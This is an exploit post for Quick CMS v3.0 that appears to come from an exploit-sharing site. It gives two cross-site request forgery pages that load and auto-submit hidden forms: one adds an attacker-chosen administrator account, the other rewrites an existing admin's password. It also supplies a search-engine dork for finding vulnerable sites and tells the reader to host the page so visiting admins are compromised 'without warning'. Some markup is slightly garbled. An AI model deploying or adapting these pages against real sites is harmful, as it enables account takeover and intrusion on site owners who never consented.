#(+) Exploit Title: Quick CMS v3.0 Cross Site Request Forgery (Add Admin User)#(+) Author: ^Xecuti0n3r#(+) E-mail: xecuti0n3r()yahoo.com#(+) Category: Web Apps [XSRF]#(+) Dork: intext:"Quick.Cms v3.0" inurl:admin.php#(+) Demo CMS Link: http://opensolution.org/Quick.Cms1#########################################10 I'm ^Xecuti0n3r member from Inj3ct0r Team1
1#########################################00-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1#All you have to do is save the below code as exploit.html#Then Host a website with the exploit.html file. A person with admin permissions if visits the site,# will automatically add the attacker as Admin without warning ;)
____________________________________________________________________
____________________________________________________________________
Code:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Quick CMS v3.0 Cross Site Request Forgery (Add Admin User)</title></head><body onload="javascript:fireForms()"><script language="JavaScript">
function fireForms(){
var count =2;
var i=0;for(i=0; i<count; i++){
document.forms[i].submit();}}</script><H2>Quick CMS v3.0 Cross Site Request Forgery (Add Admin User)</H2><form method="POST" name="form0" action="http://site.com/admin.php?p=users-form&iUser="><inputtype="hidden" name="iUser" value=""/><inputtype="hidden" name="sLoginOld" value=""/><inputtype="hidden" name="sOptionList" value="save and go to the list »"/><inputtype="hidden" name="sLogin" value="admin3"/><inputtype="hidden" name="sPass" value="admin2"/><inputtype="hidden" name="sFirstName" value="Admin2"/><inputtype="hidden" name="sLastName" value="Admin2"/><inputtype="hidden" name="sCompanyName" value="ZZZZZ"/><inputtype="hidden" name="sStreet" value="ZZZZZZZZ"/><inputtype="hidden" name="sZipCode" value="99999"/><inputtype="hidden" name="sCity" value="ZZZZZZ"/><inputtype="hidden" name="sPhone" value="9999999993"/><inputtype="hidden" name="sEmail" value="attacker@jojo.com"/></form></form></body></html>
EDIT USER:#All you have to do is save the below code as exploit.html#Then Host a website with the exploit.html file. A person with admin permissions if visits the site,# will automatically add the attacker as Admin without warning ;)
____________________________________________________________________
____________________________________________________________________
Code:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Quick CMS v3.0 Cross Site Request Forgery (Edit Existing Admin details)</title></head><body onload="javascript:fireForms()"><script language="JavaScript">
function fireForms(){
var count =2;
var i=0;for(i=0; i<count; i++){
document.forms[i].submit();}}</script><H2>Quick CMS v3.0 Cross Site Request Forgery (Edit Existing Admin details)</H2><form method="POST" name="form0" action="http://site.com/admin.php?p=admins-form"><inputtype="hidden" name="iAdmin" value="1"/><inputtype="hidden" name="iLastLogin" value="0"/><inputtype="hidden" name="iBeforeLastLogin" value="0"/><inputtype="hidden" name="sOptionList" value="save and go to the list »"/><inputtype="hidden" name="sLogin" value="demo"/><inputtype="hidden" name="aPrivilagesForm[p-list]" value="1"/><inputtype="hidden" name="aPrivilagesForm[p-form]" value="1"/><inputtype="hidden" name="sPass" value="newpassword"/><inputtype="hidden" name="sName" value="John Doe"/><inputtype="hidden" name="sEmail" value="john@doe.com"/><inputtype="hidden" name="sSignature" value="JD"/></form></form></body></html>########################################################################(+)Exploit Coded by:^Xecuti0N3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)+ All the 31337 Members :)(+)<3 to :Indian Cyber Army & Indishell Crew
########################################################################
